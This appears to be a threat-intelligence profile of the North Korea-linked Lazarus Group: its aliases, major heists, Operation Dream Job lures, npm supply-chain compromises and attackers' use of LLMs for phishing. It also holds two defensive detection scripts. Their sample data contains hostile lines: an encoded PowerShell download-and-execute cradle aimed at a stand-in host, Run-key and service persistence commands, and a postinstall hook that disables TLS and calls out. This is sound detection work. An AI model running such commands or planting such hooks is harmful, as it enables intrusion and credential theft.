Lazarus
Lazarus Group is a North Korea-linked, state-sponsored threat actor. The reporting collected here also refers to it as Hidden Cobra, Guardians of Peace, Labyrinth Chollima, Stardust Chollima, Diamond Sleet, Zinc, UNC1069, UNC1720, Storm-0139, Storm-0954, Storm-1222, Copernicium, Nickel Academy, Nickel Gladstone, Black Artemis, Lazarus APT and Lazarus APT Group. The same reporting describes financially motivated subgroups or affiliates under the Lazarus umbrella, including BlueNoroff (also called Sapphire Sleet), and references Stardust Chollima/BlueNoroff/APT38 in connection with financial operations.

Lazarus has conducted both espionage and financially motivated operations, repeatedly targeting financial institutions, cryptocurrency organizations, software supply chains, and South Korean entities. Activity linked to the group in this reporting includes the Sony Pictures Entertainment intrusion, the Bangladesh Central Bank SWIFT theft, attempted bank intrusions using Ratabanka, and evidence tying the group to WannaCry. Lazarus was also attributed as the actor behind the KelpDAO LayerZero bridge attack affecting Aave, and on February 24, 2025 it allegedly compromised an offline Ethereum wallet associated with ByBit and stole $1.5 billion in digital assets.

The group's tradecraft, as described in this reporting, includes social engineering and impersonation, especially recruiter-themed lures. During Operation Dream Job, Lazarus impersonated HR hiring personnel through LinkedIn messages and fake interviews to trick victims into downloading malware. A simulation based on a December 2018 Chilean interbank intrusion attributed to Stardust Chollima describes fake job recruitment via LinkedIn and Skype, a malicious .NET dropper disguised as a job application, execution of a Base64-encoded PowerShell payload, HTTPS command-and-control, and persistence via Registry Run keys and service creation.
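The simulation above names three host-side behaviours a defender can look for in process-creation telemetry: a Base64-encoded PowerShell payload, a Registry Run key write, and service creation. The following is an added example, not code from the Mallory page or from any of the cited reporting; it scans constructed, Sysmon Event ID 1-style events (the field names `pid`, `image`, `cmdline` and the sample command lines are assumptions built for this example) and decodes the `-EncodedCommand` argument so an analyst sees the script text rather than the Base64 blob.

```python
"""Scan process-creation events for the tradecraft the Stardust Chollima
simulation describes: Base64-encoded PowerShell payloads, Registry Run key
persistence, and service creation. The events are constructed for this
example in a Sysmon Event ID 1 style; they are not real telemetry."""
import base64
import re
from dataclasses import dataclass


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str


# PowerShell accepts abbreviated forms of -EncodedCommand; the argument is
# Base64 of UTF-16LE text, so require a reasonably long token.
ENCODED_RE = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# Autostart registry locations used for persistence (ATT&CK T1547.001).
RUN_KEY_RE = re.compile(r"(?i)\\CurrentVersion\\Run(?:Once)?\b")
# Service creation via sc.exe or the PowerShell cmdlet (ATT&CK T1543.003).
SERVICE_RE = re.compile(r"(?i)(?:\bsc(?:\.exe)?\s+create\b|\bNew-Service\b)")


def decode_encoded_command(token: str) -> str:
    """Decode an -EncodedCommand argument back to the script text."""
    try:
        raw = base64.b64decode(token)
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""
    return raw.decode("utf-16-le", errors="replace")


def scan_event(event: dict) -> list:
    """Return the findings for one process-creation event."""
    findings = []
    pid, image, cmd = event["pid"], event["image"].lower(), event["cmdline"]
    if image.endswith(("powershell.exe", "pwsh.exe")):
        match = ENCODED_RE.search(cmd)
        if match:
            decoded = decode_encoded_command(match.group(1)).strip()
            findings.append(Finding(pid, "encoded_powershell", decoded[:120]))
    if RUN_KEY_RE.search(cmd):
        findings.append(Finding(pid, "run_key_persistence", cmd[:120]))
    if SERVICE_RE.search(cmd):
        findings.append(Finding(pid, "service_creation", cmd[:120]))
    return findings


def scan_events(events) -> list:
    """Flatten findings across a batch of events."""
    return [f for e in events for f in scan_event(e)]


def _encode_ps(script: str) -> str:
    """Build a constructed -EncodedCommand token for the sample data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events: three that should fire and two benign ones.
SAMPLE_EVENTS = [
    {"pid": 101,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand "
     + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('https://c2.example.invalid/stage')")},
    {"pid": 102, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run '
                r'/v Updater /t REG_SZ /d "C:\Users\victim\AppData\Roaming\svc.exe"'},
    {"pid": 103, "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r'sc.exe create WinUpdateSvc binPath= "C:\ProgramData\svc.exe" start= auto'},
    {"pid": 104,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
    {"pid": 105, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"pid={f.pid} rule={f.rule} detail={f.detail}")
```

Running the script prints one line per finding for the three suspicious events and nothing for the two benign ones. The decoded script text is what makes the first alert triageable; a rule that only matches the `-EncodedCommand` switch fires on plenty of legitimate automation, so the decoded preview (or a secondary match on download cradles within it) is where the tuning happens.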
Lazarus-linked malware and techniques in this reporting emphasise stealth and evasion. One reported Lazarus subgroup targeting financial institutions and cryptocurrency organizations used an almost entirely memory-resident framework composed of DPAPILoader, RemotePELoader, and RemotePE. The framework used Windows DPAPI for environmental keying (payloads that only decrypt on the intended host), retrieved payloads from attacker-controlled infrastructure, and provided in-memory remote access capabilities (command execution, file manipulation, process management, and data access) while reducing forensic visibility. The reporting also documents Lazarus use of ATT&CK T1036.003, renaming system utilities for masquerading and defense evasion.

The Lazarus umbrella is also linked to software supply-chain activity. Microsoft attributed the June 2026 Mastra npm compromise to BlueNoroff/Sapphire Sleet, described as an affiliate of Lazarus Group. In that incident, attackers compromised an npm maintainer account, published malicious versions of more than 140 Mastra-related packages, inserted a typosquatted dependency named easy-day-js, and used a postinstall hook to disable TLS verification, contact command-and-control infrastructure, and deploy a Node.js backdoor that stole credentials, browser data, and cryptocurrency wallet information; in some cases additional PowerShell payloads were delivered. This tradecraft overlaps with an earlier Axios npm compromise, attributed by Microsoft to Sapphire Sleet and by Google Threat Intelligence Group to UNC1069.

Actors working under the Lazarus umbrella also used LLMs to accelerate spear-phishing operations in early 2024, mainly to scale social engineering rather than to autonomously develop malware.
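The Mastra and Axios incidents share two manifest-level tells that can be checked before a package is installed: a lifecycle script that disables TLS verification or reaches the network, and a dependency whose name is a near miss of a well-known package (easy-day-js against dayjs). The following is an added example, not code from the Mallory page or from either vendor's reporting; the sample `package.json`, the `updates.example.invalid` host and the `KNOWN_PACKAGES` allowlist are constructed for this example, and the lookalike check generalises beyond the single easy-day-js case to any dependency that embeds or closely resembles an allowlisted name.

```python
"""Review an npm package manifest for the install-time behaviour described
for the Mastra and Axios compromises: lifecycle scripts that disable TLS
verification or reach the network, and dependencies whose names are near
misses of well-known packages (as easy-day-js is for dayjs). The manifest
and the allowlist of known package names are constructed for this example."""
import json
import re
from difflib import SequenceMatcher

# npm runs these automatically on install, so they are where install-time
# payloads live.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Ways a script can turn off certificate validation: the Node environment
# variable, the https option, or curl's insecure flag.
TLS_DISABLE_RE = re.compile(
    r"NODE_TLS_REJECT_UNAUTHORIZED\s*=\s*['\"]?0|rejectUnauthorized\s*:\s*false"
    r"|\bcurl\b[^|;&]*\s(?:-k|--insecure)\b", re.I)
NETWORK_RE = re.compile(
    r"https?://|\b(?:curl|wget|Invoke-WebRequest)\b|\bfetch\(", re.I)
# Constructed allowlist; in practice this comes from the project's lockfile
# or an internal registry inventory.
KNOWN_PACKAGES = {"dayjs", "axios", "lodash", "express", "zod", "react"}


def _norm(name: str) -> str:
    """Strip separators so easy-day-js and easydayjs compare equal."""
    return re.sub(r"[^a-z0-9]", "", name.lower())


def lookalike_of(name: str, known=KNOWN_PACKAGES, threshold: float = 0.8):
    """Return the known package this name imitates, or None if it is either
    a known package itself or unlike any of them."""
    if name in known:
        return None
    norm = _norm(name)
    best, best_score = None, 0.0
    for candidate in known:
        cnorm = _norm(candidate)
        score = SequenceMatcher(None, norm, cnorm).ratio()
        # "easydayjs" contains "dayjs": a known name embedded in a longer one.
        if len(cnorm) >= 4 and cnorm in norm:
            score = max(score, 0.9)
        if score > best_score:
            best, best_score = candidate, score
    return best if best_score >= threshold else None


def review_manifest(manifest: dict) -> list:
    """Return findings as dicts with type / where / value."""
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        if TLS_DISABLE_RE.search(cmd):
            findings.append({"type": "tls_verification_disabled", "where": hook, "value": cmd})
        if NETWORK_RE.search(cmd):
            findings.append({"type": "network_in_install_script", "where": hook, "value": cmd})
    deps = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        deps.update(manifest.get(section, {}))
    for name in deps:
        target = lookalike_of(name)
        if target:
            findings.append({"type": "lookalike_dependency", "where": name, "value": target})
    return findings


# Constructed sample manifest modelled on the postinstall pattern above.
SAMPLE_MANIFEST = json.loads(r'''{
  "name": "example-widget",
  "version": "1.2.3",
  "scripts": {
    "build": "tsc -p .",
    "postinstall": "NODE_TLS_REJECT_UNAUTHORIZED=0 node -e \"require('https').get('https://updates.example.invalid/s')\""
  },
  "dependencies": {"axios": "^1.6.0", "easy-day-js": "1.0.2", "lodash": "^4.17.21"}
}''')

if __name__ == "__main__":
    for f in review_manifest(SAMPLE_MANIFEST):
        print(f"{f['type']}: {f['where']} -> {f['value']}")
```

Run against the sample manifest this reports the TLS bypass and the network call in `postinstall` plus easy-day-js as a lookalike of dayjs, and returns nothing for a manifest with only a `build` script and allowlisted dependencies. Because the check reads only `package.json`, it fits in CI before `npm install` runs; pairing it with `npm install --ignore-scripts` on untrusted packages removes the postinstall execution path altogether.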
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Where they're from
Attributed origin per open-source reporting.
- KP
Tradecraft
68 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
23 malware families attributed to this actor across reporting.
18 additional families tracked in Mallory.
Observables
126 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
20 sources tracked across advisories, community write-ups, and news.
- Attributed as the actor behind the KelpDAO LayerZero bridge exploit that enabled minting unbacked rsETH and borrowing real assets against them, contributing to major bad debt exposure for Aave.
- Referenced in connection with SentinelOne reporting on the macOS Gaslight Rust backdoor; the post context suggests DPRK-linked malware activity.
- Targeting financial institutions and cryptocurrency organizations with a memory-only malware framework to enable stealthy long-term access, financial theft, intelligence collection, and data exfiltration.
- Attributed by Google to the earlier Axios npm supply-chain attack, in which modified library versions referenced a phantom dependency to download and execute a cross-platform RAT.